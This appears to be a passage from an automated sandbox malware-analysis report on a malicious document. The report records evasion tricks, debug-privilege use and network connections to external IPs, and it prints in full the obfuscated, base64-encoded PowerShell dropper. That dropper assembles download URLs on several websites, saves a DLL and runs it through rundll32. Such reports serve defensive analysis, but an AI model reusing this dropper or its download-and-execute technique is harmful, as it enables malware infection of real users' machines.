Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 552 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00401D4D mov eax, dword ptr fs:[00000030h] 7_2_00401D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001612C1 mov eax, dword ptr fs:[00000030h] 7_2_001612C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00711D4D mov eax, dword ptr fs:[00000030h] 8_2_00711D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002612C1 mov eax, dword ptr fs:[00000030h] 8_2_002612C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00341D4D mov eax, dword ptr fs:[00000030h] 9_2_00341D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F12C1 mov eax, dword ptr fs:[00000030h] 9_2_001F12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00781D4D mov eax, dword ptr fs:[00000030h] 10_2_00781D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003C12C1 mov eax, dword ptr fs:[00000030h] 10_2_003C12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_004312C1 mov eax, dword ptr fs:[00000030h] 11_2_004312C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B12C1 mov eax, dword ptr fs:[00000030h] 12_2_001B12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00761D4D mov eax, dword ptr fs:[00000030h] 13_2_00761D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F12C1 mov eax, dword ptr fs:[00000030h] 13_2_001F12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00171D4D mov eax, dword ptr fs:[00000030h] 14_2_00171D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002712C1 mov eax, dword ptr fs:[00000030h] 14_2_002712C1
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 217.160.169.110 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.255.203.164 144
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 84.232.229.24 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ') Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
